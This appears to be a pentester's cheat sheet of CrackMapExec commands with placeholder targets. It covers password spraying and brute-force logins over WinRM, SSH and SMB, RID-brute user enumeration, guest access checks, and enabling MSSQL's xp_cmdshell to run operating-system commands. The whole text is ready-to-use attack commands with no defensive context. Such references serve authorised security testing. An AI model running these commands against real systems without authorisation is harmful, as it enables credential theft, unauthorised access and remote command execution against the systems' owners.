% crackmapexec, winrm

# winrm (no bruteforce: test 1<=>1)
cme winrm <target> -u <userlist> -p <pwdlist> --continue-on-success --no-bruteforce

# winrm (bruteforce)
cme winrm <target> -u <userlist> -p <pwdlist> --continue-on-success

% crackmapexec, ssh

# ssh (brutefoce)
cme ssh <target> -u <userlist> -p <pwdlist> --continue-on-success

# ssh (no bruteforce: test 1<=>1)
cme ssh <target> -u <userlist> -p <pwdlist> --continue-on-success --no-bruteforce

% crackmapexec, smb

# general info
cme smb <ip>

# list shares
cme smb <ip> --shares

# enumerate user
cme smb <target> -u '<user>' -p '<pass>' --rid-brute

# enumerate user as guest
cme smb <target> -u 'guest' -p '' --rid-brute

# bruteforce local user
cme smb <ip> --local-auth -u <user> -p <pwdlst>

% mssql

# Enable the xp_cmdshell on the target MSSQL
cme mssql <target> --local-auth -u <user> -p <pass> -q 'EXEC sp_configure "show advanced options", 1;RECONFIGURE;exec SP_CONFIGURE "xp_cmdshell", 1;RECONFIGURE'
cme mssql <target> --local-auth -u <user> -p <pass> -q 'EXEC xp_cmdshell "whoami"'
